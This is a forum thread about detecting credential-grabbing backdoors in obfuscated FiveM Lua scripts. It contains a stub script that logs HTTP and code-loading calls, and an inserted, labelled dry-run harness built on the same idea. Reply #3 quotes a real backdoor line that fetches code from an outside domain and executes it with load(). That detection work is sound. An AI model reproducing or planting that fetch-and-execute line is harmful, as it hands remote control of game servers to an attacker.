GRABBER DETECTION - 70% method [FREE]

posted 03-05-2024 17:39 1.182 views 8 replies
rafaeninja
0 Posts
606 Credits
N/A Since
70% method for finding out if an obfuscated script has a grabber.

How to use:

Just add it to the first line of any .lua file.


How it works:

Basically, it disables some functions and prints the parameters of these functions.
These specific functions may or may not call malicious code hosted somewhere, or hidden within the script folder.
However, as mentioned, it is 70% effective as there are several other ways.


Note:

To add more functions, just follow the same pattern.


[attachment removed]

-------------------------------------------------------------------------------------------------------------




-- Each stub below replaces a global with a version that only prints its
-- arguments. The original function is never called.

-- HTTP request function: log the target and payload, send nothing.
function PerformHttpRequest(url, callback, method, data, headers)
    print("PerformHttpRequest:")
    print("URL:", url)
    print("Callback:", callback)
    print("Method:", method)
    print("Data:", data)
    print("Headers:", headers)
end

function SendWebhookMessage(webhook, message)
    print("SendWebhookMessage:")
    print("Webhook:", webhook)
    print("Message:", message)
end

function CreateDui(link, x, y)
    print("CreateDui:")
    print("Link:", link)
    print("X Coordinate:", x)
    print("Y Coordinate:", y)
end

-- Code loaders: print what would have been loaded. These stubs return
-- nothing, so a caller that invokes the result raises an error.
function loadstring(str, chunkname)
    print("loadstring:")
    print("String:", str)
    print("Chunk Name:", chunkname)
end

function dofile(filename)
    print("dofile:")
    print("Filename:", filename)
end

function require(modname)
    print("require:")
    print("Module Name:", modname)
end

function loadfile(filename, mode, env)
    print("loadfile:")
    print("Filename:", filename)
    print("Mode:", mode)
    print("Environment:", env)
end

[/attachment]
replies (8)
2k14
939 Posts
14,880 Credits
Jan 2022 Since
#1
Thank you, nice script, respect for you
R34p3rFox
11 Posts
122 Credits
Mar 2022 Since
#2
I have just updated your code for a better experience

-- Function to replace the native functions with versions that print the information
local function overrideNativeFunctions()
local native...
R34p3rFox
11 Posts
122 Credits
Mar 2022 Since
#3
This shit is a backdoor, do not use it: PerformHttpRequest('https://thedreamoffivem.com/i?to=Wdv1M', function (e, d) pcall(function() assert(load(d))() end) end)
So I found it in VMS Spawn Selector in server/server.lua
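
Added example, not part of any post in this thread: a dry-run harness for plain Lua 5.3/5.4 that combines the stubbing idea from the first post with the loader shape quoted in reply #3, so the fetch-then-load chain shows up in a log without any network access or real code loading. The `env` table, the `record` helper, the placeholder URL and the placeholder response body are assumptions made for this illustration; it also stubs `load`, which the first post's list does not include.

```lua
-- Added example: dry-run harness for plain Lua 5.3/5.4 (not FiveM itself).
-- Everything below is constructed for illustration, including the sample.
local log = {}

local function record(name, ...)
  local args = table.pack(...)
  for i = 1, args.n do args[i] = tostring(args[i]) end
  log[#log + 1] = name .. "(" .. table.concat(args, ", ", 1, args.n) .. ")"
end

-- Environment handed to the script under test: only stubs, no real sinks.
local env = { print = function(...) record("print", ...) end,
              pcall = pcall, assert = assert, tostring = tostring }

-- Stub for HTTP: log the request, never touch the network, then call the
-- callback with a harmless placeholder body so the next step is visible.
function env.PerformHttpRequest(url, callback, method, data, headers)
  record("PerformHttpRequest", url, method, data)
  if type(callback) == "function" then
    callback(200, "FETCHED_BODY_PLACEHOLDER", {})
  end
end

-- Stubs for code loaders: log what was passed in and return a no-op
-- function, so `load(x)()` keeps going instead of erroring out and
-- hiding any later calls.
for _, name in ipairs({ "load", "loadstring", "loadfile", "dofile", "require" }) do
  env[name] = function(chunk, ...)
    record(name, chunk)
    return function() end
  end
end

-- Constructed sample with the same shape as the line quoted in reply #3
-- (placeholder URL, not the one from the thread).
local sample = [[
PerformHttpRequest('https://example.invalid/stage2', function(e, d)
  pcall(function() assert(load(d))() end)
end)
]]

-- Text-only chunk ("t") whose globals resolve to env, run under pcall.
local chunk = assert(load(sample, "=sample", "t", env))
local ok, err = pcall(chunk)
if not ok then record("error", err) end

for _, line in ipairs(log) do io.write(line, "\n") end
```

The environment deliberately contains nothing else, so a script that needs other globals stops with a recorded error until they are added to `env` one by one.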
micky1062
4 Posts
13 Credits
Apr 2024 Since
#4
Does it avoid function execution?
rafaeninja
62 Posts
606 Credits
Dec 2021 Since
#5

micky1062,
Does it avoid function execution?

In my opinion, replacing functions can interfere with the execution of the encrypted script, but its effectiveness depends on how the encrypted script was written and whether it makes use of the replaced functions.

I wouldn't risk trusting your home host like that, you have to use a VPS to test this.
sktxgaming
70 Posts
36 Credits
May 2024 Since
#6
Respect my man! Appreciate that! :)
airtech1
204 Posts
77 Credits
Apr 2024 Since
#7
Very nice work and very nice job
Alexas159
609 Posts
193 Credits
Jun 2022 Since
#8
thx for sharing good scripts
